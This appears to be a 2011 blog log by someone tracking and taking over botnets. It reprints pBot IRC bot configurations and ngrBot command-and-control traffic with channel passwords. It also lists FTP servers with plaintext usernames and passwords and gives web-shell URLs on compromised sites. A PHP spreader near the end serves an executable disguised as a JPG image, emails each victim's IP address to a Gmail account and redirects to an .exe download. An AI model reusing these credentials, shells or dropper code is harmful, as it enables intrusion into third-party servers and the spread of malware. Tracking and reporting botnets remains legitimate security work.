var $config = array("server"=>"irc.setan.us",
                    "port"=>"6667",
                    "pass"=>"",
                    "prefix"=>"|TiReX|","|MaChoo|","MaXoN|",
                    "maxrand"=>"7",
                    "chan"=>"#blocker",
                    "chan2"=>"#blocker",
                    "key"=>"bot",
                    "modes"=>"+ps",
                    "password"=>"on",
                    "trigger"=>".",
                    "hostauth"=>"110.111.112.113" // * for any hostname (remember: /setvhost takapusi.cok)
                    );
Saturday, December 31, 2011
Botnet - pBot - irc.setan.us
Friday, December 30, 2011
Owned - pBot - memex.mooo.com
// shell hxxp://britishherniasociety.org/wp-content/themes/twentyten/images/headers/xxx.php
("server"=>"memex.mooo.com",
 "port"=>"7150",
 "pass"=>"jancuk",
 "prefix"=>"endos",
 "maxrand"=>"3",
 "chan"=>"#+kpok",
 "chan2"=>"#+kpok",
 "key"=>"senhadocanal",
 "modes"=>"+p",
 "password"=>"jancuk",
 "trigger"=>".",
 "hostauth"=>"admin.unix-ccpower.com"
Owned - ngrBot - rockstar
199.193.252.177 5236 :
PASS ROCKR
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 24 domain(s)
NICK n{US|XPa}entvuwe
USER entvuwe 0 0 :entvuwe
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US
Thursday, December 29, 2011
Saturday, December 24, 2011
Saturday, December 17, 2011
Owned - ngrBot - elperro23.net
hxxp://www.virustotal.com/file-scan/report.html?id=3ca3ccdb973874d40a6a99a3bfaecab54efe55b50c1899ac9678c935e0c782e9-1324149377
Tuesday, December 13, 2011
Wednesday, December 7, 2011
FTP - Stealer - ciesplimeira.org.br
Domain : ciesplimeira.org.br IP : 199.238.129.34 PORT : 21 USER : ciespl PASS : hatuw+RUpr4dU4pu // traffic on port 21 -> | CWD etc/..PASS h | atuw+RUpr4dU4pu. | .TYPE I..SYST..C | WD etc/..PASS ha | tuw+RUpr4dU4pu.. | TYPE I..SYST..
Tuesday, December 6, 2011
Monday, December 5, 2011
Owned - malware - jjpoultrys.com
Found a PayPal phishing script on that site; here is the script :)
// usa.zip Paypal phishing ! hxxp://www.sendspace.com/file/k7kycq
Friday, December 2, 2011
Owned - Malware - newcarsnc.it
// malware info
hxxp://vxvault.siri-urz.net/ViriFiche.php?ID=10462
hxxp://www.threatexpert.com/report.aspx?md5=9EB8326C223D9330BD8B3924F4D71476
Thursday, December 1, 2011
Owned - Botnet - concertnomade.com
Session Ident: #!loco!
[14:03] * Now talking in #!loco!
[14:03] * Topic is '.m.s|.m.e fotoo :D http://www.concertnomade.com/templates/profiles.php?= '
[14:03] * Set by wd91 on Thu Dec 01 13:55:46
[14:07] * Disconnected
OWNED - Botnet - 208.67.252.82
Owned :P
// sample found here : hzzp://vxvault.siri-urz.net/ViriFiche.php?ID=10452
// spreading file profile.php?=
header('Content-disposition: attachment; filename=IMG886384737664934-JPG-www.facebook.com.exe');
header('Content-type: application/octet-stream');
readfile('qwe2');
Wednesday, November 30, 2011
Stealer - FTP - 199.238.129.124
IP : 199.238.129.124:21 USER : volun7 pass : amigo+10 // Shell hxxp://199.238.129.124/xxx.php
Monday, November 28, 2011
Owned - ngrBot - idhrix30 (HF)
63.223.79.122:5794
PASS ngrBot
NICK n{US|XPa}owsekei
USER owsekei 0 0 :owsekei
JOIN #chan ngrBot
JOIN #chanspread
PRIVMSG #chan :[DNS]: Blocked 0 domain(s) - Redirected 13 domain(s)

$ip = getenv("REMOTE_ADDR");
$content = " ----------------------------------------------------- INFECTADO SPREAD rlzz ng . =) Fecha: $Fecha / Hora: $Hora Ip Host Victima: $ip ---------- xD ----------------------------------------------------- \n";
$correo1 = "idhrix30@gmail.com";
$subject = "INFECTADO SPREAD rlzz ng - $ip";
$from = "From:INFETADO SPREAD rlzz ng";
mail($correo1,$subject,$content,$from);
?>
<html><head>
<meta http-equiv="refresh" content="0; URL=IMG80593858.exe">
</head>